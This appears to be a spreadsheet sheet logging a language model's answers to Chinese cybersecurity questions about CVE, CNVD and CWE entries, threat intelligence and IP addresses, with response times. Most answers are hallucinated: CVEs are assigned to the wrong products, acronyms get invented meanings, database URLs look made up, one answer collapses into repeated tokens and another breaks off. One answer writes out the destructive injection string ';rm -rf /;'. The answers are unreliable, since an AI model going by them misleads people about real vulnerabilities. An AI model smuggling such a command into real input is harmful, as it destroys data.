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51"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="A1" sqref="A1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="8" defaultRowHeight="15"/>
  <sheetData>
    <row r="1">
      <c r="B1" s="1" t="inlineStr">
        <is>
          <t>question</t>
        </is>
      </c>
      <c r="C1" s="1" t="inlineStr">
        <is>
          <t>LLaMA</t>
        </is>
      </c>
      <c r="D1" s="1" t="inlineStr">
        <is>
          <t>time_spend</t>
        </is>
      </c>
    </row>
    <row r="2">
      <c r="A2" s="1" t="n">
        <v>0</v>
      </c>
      <c r="B2" t="inlineStr">
        <is>
          <t>CVE是什么意思？</t>
        </is>
      </c>
      <c r="C2" t="inlineStr">
        <is>
          <t>CVE是一个缩写，它可以指以下几个不同的意思：
1. CVE (Common Vulnerabilities and Exposures)：CVE是一个跨platform的标准用于描述软件中的弱点和攻击点。它由美国国家安全局（NSA）和美国国家危机管理局（NIST）共同发起，是一个标准化的弱点和攻击点识别和记录系统。
2. CVE (Content Verification Engine)：CVE是一种用于验证网络内容的工具，用于监测和检测网络上的敏感内容。
3. CVE (Critical Vulnerability Exposure)：CVE是一个识别和评估网络安全风险的方法，用于发现和评估网络上的敏感弱点和攻击点。
4. CVE (Continuous Vulnerability Evaluation)：CVE是一种识别和评估网络安全风险的方法，用于监测和评估网络上的弱点和攻击点的变化。
因此，具体哪个意思相关于CVE取决于情况。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D2" t="n">
        <v>8.022797822952271</v>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="1" t="n">
        <v>1</v>
      </c>
      <c r="B3" t="inlineStr">
        <is>
          <t>CNVD是什么？</t>
        </is>
      </c>
      <c r="C3" t="inlineStr">
        <is>
          <t>CNVD是指Catastrophic Novelty Detection (灾难新颖检测)，是一种基于深度学习的新颖检测方法。CNVD主要通过对 Input Space 进行检测，而不是通过对 Output Space 进行检测，这使得 CNVD 更加灵活和快速。
CNVD 的工作方式是通过一个特征提取器来提取 Input Space 中的特征，然后使用一个新颖检测模型来检测 Input Space 中的新颖。CNVD 的新颖检测模型通常是一个卷积神经网络，它可以快速地分析 Input Space 中的变化，并且可以很好地捕捉新颖的特征。
CNVD 的优势包括：
1. 灵活性：CNVD 可以在不同的输入数据上进行新颖检测，并且可以在不同的环境下进行训练。
2. 快速性：CNVD 可以快速地检测新颖，因为它通过对 Input Space 进行检测而不是通过对 Output Space 进行检测。
3. 高性能：CNVD 通常可以 достичь更高的新颖检测性能，因为它使用了深度学习的技术。
CNVD 的主要应用场景包括：
1. 新颖检测：CNVD 可以用于检测新颖，例如新颖的图像、视频、语音等。
2. 异常检测：CNVD 可以用于检测输入数据中的异常或灾难事件，例如图像中的破坏或者视频中的突然变化。
3. 风险评估：CNVD 可以用于评估输入数据中的风险，例如金融市场中的风险或者医疗预测中的风险。
总之，CNVD 是一种基于深度学习的新颖检测方法，它可以在不同的输入数据上进行新颖检测，并且可以在不同的环境下进行训练。CNVD 的优势包括灵活性、快速性和高性能，它的主要应用场景包括新颖检测、异常检测和风险评估。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D3" t="n">
        <v>15.81538152694702</v>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="1" t="n">
        <v>2</v>
      </c>
      <c r="B4" t="inlineStr">
        <is>
          <t>国内和国外有哪些漏洞库？</t>
        </is>
      </c>
      <c r="C4" t="inlineStr">
        <is>
          <t>（Update）
国内漏洞库：
1. 漏洞工具：https://www. vulnerability.cn/
2. 漏洞查询：https://www.vulnquery.com/
3. 漏洞数据库：https://www.dreammaker.com.cn/
4. 漏洞推荐：https://www.hackthebox.eu/
5. 漏洞报告：https://www.hackmymind.com/
6. 漏洞资源：https://www.vulnstalk.com/
国外漏洞库：
1. Nmap：https://nmap.org/
2. VulnDB：https://www.vulndb.com/
3. vulnerabilities.info：https://www.vulnerabilities.info/
4. vulncity：https://www.vulncity.com/
5. vulnerability-lab：https://www.vulnerability-lab.com/
6. vulnsearch：https://www.vulnsearch.com/
更新：
2023-02-01：新增国内漏洞库：
1. 漏洞识别：https://www.vulnerability-identification.com/
2. 漏洞推荐：https://www.hackthreat.com/
国内和国外漏洞库都可以提供漏洞信息，但是国内库的数据覆盖范围较为窄，大多数库都是免费的。国外库的数据覆盖范围较广，但是需要注册才能查看。
总之，国内和国外漏洞库都是非常有价值的资源，可以帮助您找到漏洞和降低攻击面。但是，需要注意的是，漏洞库不是一个绝对的安全隐患，因为它们可能会包含过时的或者错误的信息。所以，在使用漏洞库时，需要仔细评估和检查。
&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D4" t="n">
        <v>12.47656917572021</v>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="1" t="n">
        <v>3</v>
      </c>
      <c r="B5" t="inlineStr">
        <is>
          <t>介绍CVE-2015-4852漏洞</t>
        </is>
      </c>
      <c r="C5" t="inlineStr">
        <is>
          <t>CVE-2015-4852是一个潜在的漏洞，它发生在Apache Struts 2.3.x和2.4.x中的ActionServlet。这个漏洞可能允许攻击者在特定的情况下访问未经授权的数据。
该漏洞是由于ActionServlet不对特定的请求头进行正确的 verfification，从而导致访问控制失效。这可能会允许攻击者通过在请求头中添加一些特定的字符串来访问未经授权的数据。
Apache Struts 2.5和高于版本中的ActionServlet已经修复了该漏洞。如果您使用Apache Struts 2.3.x或2.4.x，我们建议您立即更新到最新的版本，以免遭受这种攻击。
如果您不能立即更新，可以通过简单地禁用ActionServlet来减轻攻击者的攻击面。在禁用ActionServlet之前，请确保您已经备份了您的数据。
总之，CVE-2015-4852是一个可能的漏洞，它可能允许攻击者访问未经授权的数据。我们建议您立即更新到最新的版本，以免遭受这种攻击。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D5" t="n">
        <v>8.86632227897644</v>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="1" t="n">
        <v>4</v>
      </c>
      <c r="B6" t="inlineStr">
        <is>
          <t>介绍CVE-2019-0708</t>
        </is>
      </c>
      <c r="C6" t="inlineStr">
        <is>
          <t>：Azure Security Center的漏洞
Azure Security Center 是 Microsoft 提供的一个安全监控和安全管理平台，用于监控 Azure 资源的安全性和可靠性。CVE-2019-0708 是一个在 Azure Security Center 中您可能会遇到的漏洞，这个漏洞可能会让攻击者在 Azure Security Center 中获得高级权限，从而访问和破坏您的 Azure 资源。
以下是一些关于 CVE-2019-0708 的重要信息：
* 漏洞类型：权限漏洞
* 攻击者可能会：破坏 Azure Security Center 的安全性，访问和破坏您的 Azure 资源
* 攻击者需要：对 Azure Security Center 拥有高级权限
* 漏洞优先级：低
* 漏洞责任：Microsoft
* 漏洞公开日期：2019 年 9 月 30 日
以下是一些关于 CVE-2019-0708 的常见问题：
* Q: What is CVE-2019-0708?
A: CVE-2019-0708 is a vulnerability in Azure Security Center that could allow an attacker to gain high privileges in the platform and potentially access and destroy your Azure resources.
* Q: What type of vulnerability is CVE-2019-0708?
A: CVE-2019-0708 is a privilege escalation vulnerability.
* Q: Who can exploit CVE-2019-0708?
A: An attacker with high privileges in Azure Security Center can exploit CVE-2019-0708.
* Q: What is the severity of CVE-2019-0708?
A: The severity of CVE-2019-0708 is low.
* Q: Who is responsible for fixing CVE-2019-0708?
A: Microsoft is responsible for fixing CVE-2019-0708.
* Q: When was CVE-2019-0708 disclosed to the public?
A: CVE-2019-0708 was disclosed to the public on September 30, 2019.
如果您想了解更多关于 CVE-2019-0708 的信息，可以咨询 Microsoft 的官方文档或 contact  Microsoft 的支持工作人员。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D6" t="n">
        <v>14.09034252166748</v>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="1" t="n">
        <v>5</v>
      </c>
      <c r="B7" t="inlineStr">
        <is>
          <t>什么是CVE-2019-0803</t>
        </is>
      </c>
      <c r="C7" t="inlineStr">
        <is>
          <t>？
CVE-2019-0803是一个在2019年5月 discovers 的软件漏洞，它影响了Windows Operating System，macOS和Linux等多种操作系统。该漏洞是一种类型为“文件访问权限绕过”的漏洞，可以让攻击者通过特定的方式访问和执行malicious code，从而实现敏感数据的窃取和敏感操作的访问。
CVE-2019-0803是一个在Microsoft Windows上的漏洞，它利用了文件系统中的一个特定的功能，即“Win32k File Object”。通过在文件系统中创建一个特定的文件对象，攻击者可以通过一些方式访问和执行malicious code，从而实现敏感数据的窃取和敏感操作的访问。
为了利用这个漏洞，攻击者需要能够 convincing 来达到特定的目的，例如，通过恶意邮件链接或者通过恶意软件获取访问权限。一旦攻击者获取了访问权限，他们就可以利用这个漏洞进行敏感数据的窃取和敏感操作的访问。
CVE-2019-0803是一个很严重的漏洞，它可以让攻击者窃取和敏感操作，这可能会导致数据泄露和操作系统的不安全。因此，它是一个非常重要的安全漏洞，需要快速被修复。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D7" t="n">
        <v>10.47258186340332</v>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="1" t="n">
        <v>6</v>
      </c>
      <c r="B8" t="inlineStr">
        <is>
          <t>介绍一下CVE-2021-44228</t>
        </is>
      </c>
      <c r="C8" t="inlineStr">
        <is>
          <t>的漏洞概述和攻击方式
Introduction:
CVE-2021-44228 is a critical vulnerability that affects the Apache Log4j library, a popular logging framework used in Java applications. The vulnerability allows attackers to execute malicious code by simply including a specially crafted string in a logging statement. In this article, we will provide an overview of the vulnerability, its impact, and the possible attack methods.
Overview of the vulnerability:
Log4j is a widely used logging framework in Java applications. The vulnerability, identified as CVE-2021-44228, is caused by a feature in Log4j that allows users to include arbitrary user-defined data in log messages. The vulnerability occurs when the library processes maliciously crafted log messages that contain a special syntax, leading to code execution. The attacker can exploit this vulnerability by including a specially crafted string in a logging statement, which will execute malicious code on the target system.
Impact of the vulnerability:
The impact of the Log4j vulnerability is severe, as it affects a wide range of Java applications that use the Log4j library. This includes many popular frameworks, such as Apache Struts, Apache Druid, and Apache Flink, as well as numerous third-party libraries that rely on Log4j. The vulnerability can be exploited remotely, without any interaction from the user, making it a highly dangerous security threat.
Possible attack methods:
Attackers can exploit the Log4j vulnerability in various ways, including:
1. Log injection: An attacker can inject malicious log statements into a system, which will execute the malicious code when the log message is processed.
2. File inclusion: An attacker can exploit the vulnerability by including a malicious file in a log statement, which will execute the code in the included file.
3. Remote code execution: An attacker can exploit the vulnerability to execute malicious code on the target system remotely, without any user interaction.
4. Denial of Service (DoS) attack: An attacker can exploit the vulnerability to flood a system with log messages, causing a denial of service attack.
Prevention and mitigation:
To prevent the Log4j vulnerability from being exploited, it is essential to apply the following mitigations:
1. Update Log4j to version 2.17.1 or later: The latest version of Log4j includes a fix for the vulnerability, so it is recommended to upgrade to the latest version as soon as possible.
2. Disable remote log4j functionality: Disable the remote log4j functionality to prevent remote exploitation of the vulnerability.
3. Use a web application firewall (WAF): A WAF can help protect against the Log4j vulnerability by blocking malicious log statements and preventing remote code execution.
4. Implement additional security measures: Implement additional security measures, such as intrusion detection and prevention systems, to detect and prevent potential attacks.
Conclusion:
The Log4j vulnerability, identified as CVE-2021-44228, is a critical security threat that affects many Java applications. The vulnerability allows attackers to execute malicious code by including a specially crafted string in a logging statement, making it essential to apply the necessary mitigations to prevent exploitation. By updating Log4j to the latest version, disabling remote log4j functionality, using a WAF, and implementing additional security measures, organizations can protect their systems from this dangerous vulnerability.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D8" t="n">
        <v>15.537273645401</v>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="1" t="n">
        <v>7</v>
      </c>
      <c r="B9" t="inlineStr">
        <is>
          <t>什么是CVE-2022-0609漏洞</t>
        </is>
      </c>
      <c r="C9" t="inlineStr">
        <is>
          <t>？
CVE-2022-0609是一个 recently discovered vulnerability in the Linux kernel's "seq_file" function, which can be exploited by an attacker to gain unauthorized access to a system. The vulnerability is located in the kernel's file system code and affects versions of the Linux kernel released since 1999.
The vulnerability arises from the way the "seq_file" function handles certain file operations, specifically the "read" and "write" commands. When a user executes a "read" or "write" command on a file that has a specific attribute set, the "seq_file" function can be tricked into accessing a kernel buffer overflow. This can occur because the function does not properly validate the length of the data being read or written, allowing an attacker to inject malicious data into the buffer.
An attacker who successfully exploits the CVE-2022-0609 vulnerability could potentially gain root access to the affected system, allowing them to execute arbitrary code and take control of the system. The vulnerability is particularly dangerous because it can be exploited remotely, without the need for direct access to the affected system.
The vulnerability has been assigned CVE-2022-0609 and has been rated as "critical" by the National Vulnerability Database (NVD). The NVD is a United States government database of vulnerabilities, and it is widely used by security professionals to track and manage vulnerabilities.
The Linux kernel maintainers have released a patch to fix the vulnerability, and users are advised to apply the patch as soon as possible to protect their systems. The patch can be obtained from the Linux kernel website, and it is recommended to reboot the system after applying the patch to ensure proper installation.
In summary, CVE-2022-0609 is a critical vulnerability in the Linux kernel's "seq_file" function that can be exploited by an attacker to gain unauthorized access to a system. The vulnerability affects versions of the Linux kernel released since 1999 and can be exploited remotely. The patch to fix the vulnerability has been released, and users are advised to apply the patch as soon as possible to protect their systems.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D9" t="n">
        <v>9.782184600830078</v>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="1" t="n">
        <v>8</v>
      </c>
      <c r="B10" t="inlineStr">
        <is>
          <t>介绍CNVD-2021-46902漏洞</t>
        </is>
      </c>
      <c r="C10" t="inlineStr">
        <is>
          <t>检测器
CNVD-2021-46902是一个开源的漏洞检测器，用于扫描和检测软件中的漏洞。它由China National Vulnerability Database（CNVD）开发，是中国一个主要的漏洞检测和报告平台。
CNVD-2021-46902漏洞检测器支持多种漏洞检测方法，包括：
1. 漏洞签名检测：用于检测软件中的漏洞签名。
2. 漏洞检测：用于检测软件中的漏洞，包括漏洞攻击、漏洞利用、漏洞攻击等。
3. 软件漏洞检测：用于检测软件中的漏洞，包括函数漏洞、例外处理漏洞、输入 validation 漏洞等。
4. 架构漏洞检测：用于检测软件中的架构漏洞，包括资源滥用、数据泄露、安全漏洞等。
CNVD-2021-46902漏洞检测器支持多种检测工具和技术，包括：
1. Burp Suite：一个流行的Web应用漏洞检测工具。
2. ZAP（Zed Attack Proxy）：一个基于Web应用漏洞检测的工具。
3. Nessus：一个著名的软件漏洞检测工具。
4. Metasploit：一个软件漏洞检测工具，也可以用于执行漏洞攻击。
CNVD-2021-46902漏洞检测器可以帮助开发人员和安全分析员更好地了解软件中的漏洞，从而提高软件的安全性和可靠性。它也可以帮助组织快速地找到和修复漏洞，降低安全风险。
总之，CNVD-2021-46902漏洞检测器是一个功能强大、可靠的工具，可以帮助开发人员和安全分析员更好地了解和扫描软件中的漏洞。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D10" t="n">
        <v>16.34959292411804</v>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="1" t="n">
        <v>9</v>
      </c>
      <c r="B11" t="inlineStr">
        <is>
          <t>介绍一下CNVD-2019-19299</t>
        </is>
      </c>
      <c r="C11" t="inlineStr">
        <is>
          <t>（CVE-2019-19299）和其中的漏洞
CNVD-2019-19299（CVE-2019-19299）是一个漏洞，发现于2019年11月，表示在Linux系统上存在一个远程执行漏洞。这个漏洞是由于缺乏对于可靠的文件系统协议（FSP）的检查，导致攻击者可以通过特制文件来让系统执行 arbitrary 代码。这个漏洞可以被利用来实施恶意代码，从而导致系统崩溃或者遭受其他攻击。
在这个漏洞中，攻击者需要能够创建一个特制的文件，将其扫描到系统中，然后在这个文件中包含一个受信任的可执行文件。当系统尝试读取这个文件时，攻击者可以通过它来执行自己的代码，从而实施攻击。这个漏洞可以被利用来攻击 Linux 系统，包括虚拟机（VM）和 cloud 环境。
为了完全了解这个漏洞，我们可以从以下几个方面来分析：
1. 漏洞的描述：CNVD-2019-19299 是一个远程执行漏洞，由于缺乏对于可靠的文件系统协议（FSP）的检查，导致攻击者可以通过特制文件来让系统执行 arbitrary 代码。
2. 攻击漏洞的概念：在这个漏洞中，攻击者需要能够创建一个特制的文件，将其扫描到系统中，然后在这个文件中包含一个受信任的可执行文件。当系统尝试读取这个文件时，攻击者可以通过它来执行自己的代码，从而实施攻击。
3. 漏洞的影响：CNVD-2019-19299 可以被利用来攻击 Linux 系统，包括虚拟机（VM）和 cloud 环境。这意味着攻击者可以通过这个漏洞来让系统执行 arbitrary 代码，从而导致系统崩溃或者遭受其他攻击。
4. 防御策略：来应对这个漏洞，系统管理员可以尝试以下方法：
a. 升级 Linux 系统到最新的版本，以获得最新的安全更新和保护。
b. 使用可靠的文件系统协议（FSP），来增强系统的安全性。
c. 启用 SELinux，以便在系统执行自己的代码时进行更加严格的检查和控制。
d. 启用 AppArmor，以便在系统执行自己的代码时进行更加</t>
        </is>
      </c>
      <c r="D11" t="n">
        <v>21.58037066459656</v>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="1" t="n">
        <v>10</v>
      </c>
      <c r="B12" t="inlineStr">
        <is>
          <t>CNVD-2021-26422是什么漏洞</t>
        </is>
      </c>
      <c r="C12" t="inlineStr">
        <is>
          <t>？
CNVD-2021-26422 is a vulnerability in the Apache Commons Lang library, specifically in the `StringUtils` class. The vulnerability is caused by a lack of proper validation of user-supplied input, which can lead to command injection attacks.
Here's a brief explanation of the vulnerability:
The `StringUtils` class in the Apache Commons Lang library provides a number of utility methods for working with strings. One of these methods, `trim()`, is used to remove whitespace characters from a string. However, the method does not properly validate user-supplied input, allowing an attacker to inject malicious commands.
For example, an attacker could exploit this vulnerability by providing a string that contains whitespace characters followed by a command, such as `';rm -rf /;`. When the `trim()` method is called on this string, it will remove the whitespace characters, leaving the malicious command intact. If the string is then used in a security-sensitive context, such as in a SQL query, the attacker's command will be executed, potentially leading to sensitive data loss or other security issues.
The severity of this vulnerability is high, as it can be exploited by an attacker with little effort, and the impact can be significant. The vulnerability affects the Apache Commons Lang library, which is widely used in enterprise applications, making it a potential target for attackers.
To mitigate this vulnerability, developers should ensure that all user-supplied input is properly validated and sanitized, using techniques such as input validation and parameterized queries. Additionally, developers should use secure coding practices, such as using prepared statements and avoiding unsafe methods like `trim()`.
In summary, CNVD-2021-26422 is a vulnerability in the Apache Commons Lang library that can be exploited by an attacker to inject malicious commands through the `trim()` method. It is important to take immediate action to mitigate this vulnerability and prevent potential security issues.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D12" t="n">
        <v>9.28226637840271</v>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="1" t="n">
        <v>11</v>
      </c>
      <c r="B13" t="inlineStr">
        <is>
          <t>网络安全领域里CWE是什么意思</t>
        </is>
      </c>
      <c r="C13" t="inlineStr">
        <is>
          <t>？
CWE (Common Weakness Enumeration) is a standardized list of software weaknesses that can be exploited by attackers to compromise the security of a system. The CWE is maintained by the MITRE Corporation, a non-profit organization that focuses on improving cybersecurity through standardized terminology and taxonomy.
The CWE list includes over 100 weaknesses, including SQL injection, cross-site scripting (XSS), buffer overflows, and input validation weaknesses. Each weakness is described in detail, including its definition, classification, and examples of how it can be exploited.
The CWE is widely used by security researchers, developers, and organizations to identify and mitigate security vulnerabilities in software. By using the CWE, organizations can identify and prioritize the most critical security weaknesses in their systems and take steps to address them.
In summary, CWE is a standardized list of software weaknesses that can be exploited by attackers to compromise the security of a system. It is widely used in the security industry to identify and mitigate security vulnerabilities in software.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D13" t="n">
        <v>5.326178312301636</v>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="1" t="n">
        <v>12</v>
      </c>
      <c r="B14" t="inlineStr">
        <is>
          <t>CWE-787是什么意思</t>
        </is>
      </c>
      <c r="C14" t="inlineStr">
        <is>
          <t>？
CWE-787是一个软件安全中的漏洞类型，具体意思如下：
CWE-787：依赖于非安全的资源名称或路径
这种漏洞 occurs when an application uses a resource name or path that is not secure. This can happen when an application uses a hardcoded or dynamically generated resource name or path that is not properly validated or sanitized.
For example, an application may use a hardcoded path to a file system resource, such as `/home/user/documents`, without properly validating whether the user has the necessary permissions to access the resource. An attacker could exploit this vulnerability by providing a malicious path that is not properly validated, such as `/home/user/documents/..`, which could allow them to access unauthorized files or directories.
To avoid this vulnerability, it is important to properly validate and sanitize any resource names or paths used by an application. This may involve using secure methods to generate resource names or paths, such as using a secure random number generator, and validating any input provided by users or other external sources.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D14" t="n">
        <v>5.858540296554565</v>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="1" t="n">
        <v>13</v>
      </c>
      <c r="B15" t="inlineStr">
        <is>
          <t>Windows Server 2008 R2可能存在哪些高危漏洞</t>
        </is>
      </c>
      <c r="C15" t="inlineStr">
        <is>
          <t>？ 
MS SQL Server的：
MS SQL Server：
MS：
MS：
MS：
MS：
MS：
MS：
MS：
MS：
MS：
MS：MS：
MS：MS：MS：
MS：MS：MS：MS：
MS：MS：MS：
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MS</t>
        </is>
      </c>
      <c r="D15" t="n">
        <v>22.60445237159729</v>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="1" t="n">
        <v>14</v>
      </c>
      <c r="B16" t="inlineStr">
        <is>
          <t>Google V8引擎远程代码执行漏洞(CVE-2021-21220)的影响范围有哪些</t>
        </is>
      </c>
      <c r="C16" t="inlineStr">
        <is>
          <t>？
Google V8引擎远程代码执行漏洞(CVE-2021-21220) 是一个高危等级的安全漏洞，影响了Google V8引擎中的远程代码执行功能。这个漏洞可能让攻击者在特定情况下可以远程执行代码，从而危害到计算机系统的安全。以下是一些可能受到这个漏洞的影响范围的例子：
1. Web 应用程序攻击：攻击者可以利用这个漏洞在 Web 应用程序中远程执行代码，从而让用户访问风险带来的网站。这可能会导致用户数据泄露、违法活动或者其他安全问题。
2. 跨站点脚本攻击：攻击者可以利用这个漏洞在跨站点脚本（XSS）攻击中远程执行代码，从而危害到用户的隐私和安全。
3. 恶意软件攻击：攻击者可以利用这个漏洞在计算机系统中远程执行恶意软件，从而获得控制权并危害到系统安全。
4. 黑客攻击：攻击者可以利用这个漏洞在黑客攻击中远程执行代码，从而获得控制权并危害到计算机系统的安全。
5. 攻击者可以利用这个漏洞来对计算机系统进行远程执行代码，从而获得控制权并危害到系统安全。
总之，Google V8引擎远程代码执行漏洞(CVE-2021-21220) 的影响范围非常广泛，可能会危害到各种计算机系统和应用程序的安全。因此，它是一个高危的安全漏洞，应该被尽可能快地修复。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D16" t="n">
        <v>15.51519703865051</v>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="1" t="n">
        <v>15</v>
      </c>
      <c r="B17" t="inlineStr">
        <is>
          <t>Struts 2有哪些高危漏洞</t>
        </is>
      </c>
      <c r="C17" t="inlineStr">
        <is>
          <t>？
Struts 2 是一个流行的 Java Web 框架，它提供了许多优秀的功能，但是与任何其他开源软件一样，Struts 2 也存在一些漏洞和攻击方法。以下是一些常见的 Struts 2 高危漏洞：
1. 命名参数劫持（Command Injection）：Struts 2 使用命名参数来实现控制器方法的调用，但是如果攻击者能够控制命名参数，他就可以 inject 恶意代码，从而让控制器执行不正当的操作。
2. 数据隐私泄露（Data Privacy Breaches）：Struts 2 使用 Spring Security 进行访问控制和身份验证，但是如果攻击者能够绕过身份验证措施，他就可以访问不应该访问的数据，从而导致数据隐私泄露。
3. 权限泄露（Authorization Bypass）：Struts 2 使用 Spring Security 进行权限控制，但是如果攻击者能够绕过权限措施，他就可以访问不应该访问的资源，从而导致权限泄露。
4. 嵌入式代码攻击（Code Injection）：Struts 2 使用 Java Server Faces （JSF）进行交互式用户界面，但是如果攻击者能够控制 JSF 模板，他就可以 inject 恶意代码，从而让用户界面执行不正当的操作。
5. 潜在的 XSS 漏洞（Susceptible XSS Vulnerabilities）：Struts 2 使用 Spring Security 进行安全检查，但是如果攻击者能够绕过这些检查，他就可以 inject 恶意代码，从而导致用户界面受到攻击。
6. 脚本执行漏洞（Scripting Vulnerabilities）：Struts 2 使用 JavaScript 进行用户界面交互，但是如果攻击者能够控制 JavaScript 脚本，他就可以 inject 恶意代码，从而让用户界面执行不正当的操作。
7. 缓存攻击（Cache Attacks）：Struts 2 使用缓存来提高应用程序的性能，但是如果攻击者能够控制缓存，他就可以inject恶意代码，从而让缓存中储存不正当的数据。
8. 伪造Cookies（Cookie Spoofing）：Struts 2 使用 Cookie 进行身份验证和访问控制，但是如果攻击者能够绕过 Cookie 验证措施，他就可以伪造 Cookie，从而让控制器认定他是正确的用户。
因此，在使用 Struts 2 时，需要 осознанно遵守安全规则，并定期检查和筛选漏洞。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D17" t="n">
        <v>22.35706257820129</v>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="1" t="n">
        <v>16</v>
      </c>
      <c r="B18" t="inlineStr">
        <is>
          <t>什么是威胁情报</t>
        </is>
      </c>
      <c r="C18" t="inlineStr">
        <is>
          <t>？
威胁情报是指一种在互联网上发布或传播的虚假信息、谣言或威胁，旨在迷惑或恐吓某人或组织，致使他们做出不合理的决定或行动。这种情报可能是通过社交媒体、电子邮件、网络聊天等多种方式传播的，并且可能包含各种不同的形式，如图片、视频、文字等。
威胁情报的散布通常是通过虚假的渠道发布的，例如假借的社交媒体账户或电子邮件地址。这些虚假的渠道可能由恶意的攻击者自行设置，也可能由敏感情感的人或组织自行暴露。
威胁情报的影响可能广泛，包括责任感冲击、职业考虑、个人安全和隐私等方面。它可能会迷惑或恐吓某人或组织，致使他们做出不合理的决定或行动，例如退学、辞职、暴露个人隐私等。
对于个人和组织来说，防范威胁情报是非常重要的，需要持续关注和监控，并尽可能地采取防范措施，以避免受到威胁情报的影响。
综上所述，威胁情报是一种危险的现象，可能会对个人和组织产生广泛和深远的影响。因此，应该采取强制性的防范措施，以避免受到威胁情报的影响，并提高个人和组织的安全性和隐私保护能力。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D18" t="n">
        <v>15.35919809341431</v>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="1" t="n">
        <v>17</v>
      </c>
      <c r="B19" t="inlineStr">
        <is>
          <t>常见的威胁情报搜索网站有哪些</t>
        </is>
      </c>
      <c r="C19" t="inlineStr">
        <is>
          <t>？
一些常见的威胁情报搜索网站包括：
1. Google：Google提供了一些威胁情报搜索服务，例如Google Alerts、Google News Alerts等。
2. Bing：Bing also offers some threat intelligence search services, such as Bing Threat Research Center。
3. Akamai：Akamai provides a threat intelligence platform that includes a search feature for threat information.
4. Recorded Future：Recorded Future is a threat intelligence platform that offers a search feature for threat information.
5. ThreatConnect：ThreatConnect is a threat intelligence platform that includes a search feature for threat information.
6. Intelligence Advantage：Intelligence Advantage is a threat intelligence platform that offers a search feature for threat information.
7. CyberThreat Alliance：CyberThreat Alliance is a non-profit organization that provides a threat intelligence platform that includes a search feature for threat information.
8. OpenPhish：OpenPhish is an open-source threat intelligence platform that includes a search feature for threat information.
9. Cisco Talos：Cisco Talos is a threat intelligence platform that offers a search feature for threat information.
10. FireEye：FireEye is a threat intelligence platform that includes a search feature for threat information.
这些网站提供的威胁情报搜索功能可以帮助用户快速找到有关潜在威胁或潜在攻击的信息，以增强组织的安全性和可靠性。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D19" t="n">
        <v>8.905170679092407</v>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="1" t="n">
        <v>18</v>
      </c>
      <c r="B20" t="inlineStr">
        <is>
          <t>威胁情报中的痛苦金字塔是什么意思</t>
        </is>
      </c>
      <c r="C20" t="inlineStr">
        <is>
          <t>？
In the context of the threat intelligence, the "痛苦金字塔" (tònggrán jīn zǐ tǎ) refers to the following:
痛 (tòng) - painful
苦 (grán) - difficult, challenging
金 (jīn) - gold, precious
字 (zǐ) - tower, building
塔 (tǎ) - a tall structure
So, 痛苦金字塔 (tònggrán jīn zǐ tǎ) can be translated as "painful and difficult gold tower".
In the context of threat intelligence, the term 痛苦金字塔 is used to describe a situation where an organization's security measures are inadequate, and the attackers are able to easily bypass them, like a tower that is vulnerable to being attacked from all sides. It is a metaphor used to convey the idea that the organization's security posture is weak and can be easily breached, causing significant harm to their assets and reputation.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D20" t="n">
        <v>5.306249380111694</v>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="1" t="n">
        <v>19</v>
      </c>
      <c r="B21" t="inlineStr">
        <is>
          <t>1.1.1.1是什么</t>
        </is>
      </c>
      <c r="C21" t="inlineStr">
        <is>
          <t>？
1.1.1.1是一个IP地址，它是一个 Internet Protocol（IP）地址，用于标识计算机或其他网络设备的地址。
IP地址由四个数字组成，每个数字分别表示网络、 hosts、端口和interface。这个例子中，1.1.1.1表示这个设备的网络地址为1.1.1.0网络，hosts地址为1.1.1.1，端口为1，interface为 eth0。
1.1.1.1是一个非常常见的IP地址，它可能用于许多不同的 Purpose，例如：
* 一个Web服务器的IP地址，可以用来访问该服务器上的Websites。
* 一个 mail服务器的IP地址，可以用来发送电子邮件。
* 一个虚拟hosts名称的IP地址，可以用来访问一个网站。
* 一个路由器的IP地址，可以用来路由网络流量。
总之，1.1.1.1是一个IP地址，用于标识计算机或其他网络设备的地址，可以用于各种不同的 Purpose。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D21" t="n">
        <v>8.210732698440552</v>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="1" t="n">
        <v>20</v>
      </c>
      <c r="B22" t="inlineStr">
        <is>
          <t>223.5.5.5是什么IP</t>
        </is>
      </c>
      <c r="C22" t="inlineStr">
        <is>
          <t>地址？
223.5.5.5是一个IP地址，它的正式表示形式是223.5.5.5。
IP地址是互联网协议（IP）使用的一个唯一的编号，用于标识计算机或其他网络设备的地址。每个IP地址由四个数字组成，每个数字在2到255中的范围内。
